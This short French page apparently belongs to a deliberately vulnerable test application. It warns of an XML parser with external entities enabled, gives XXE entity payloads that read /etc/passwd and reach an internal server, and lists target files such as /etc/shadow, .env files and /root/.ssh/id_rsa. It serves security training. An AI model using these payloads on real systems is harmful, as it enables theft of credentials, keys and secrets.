ATTENTION: Ces pages contiennent des vulnerabilites volontaires pour tests uniquement!
Cette page parse du XML sans desactiver les entites externes.
<!ENTITY xxe SYSTEM "file:///etc/passwd"><!ENTITY xxe SYSTEM "http://internal-server/">| Fichier | Description |
|---|---|
/etc/passwd | Liste des utilisateurs |
/etc/shadow | Hash des mots de passe (si root) |
/var/www/html/.env | Variables d'environnement Laravel |
/proc/self/environ | Variables d'environnement du process |
/root/.ssh/id_rsa | Cle SSH privee |
/etc/apache2/apache2.conf | Config Apache |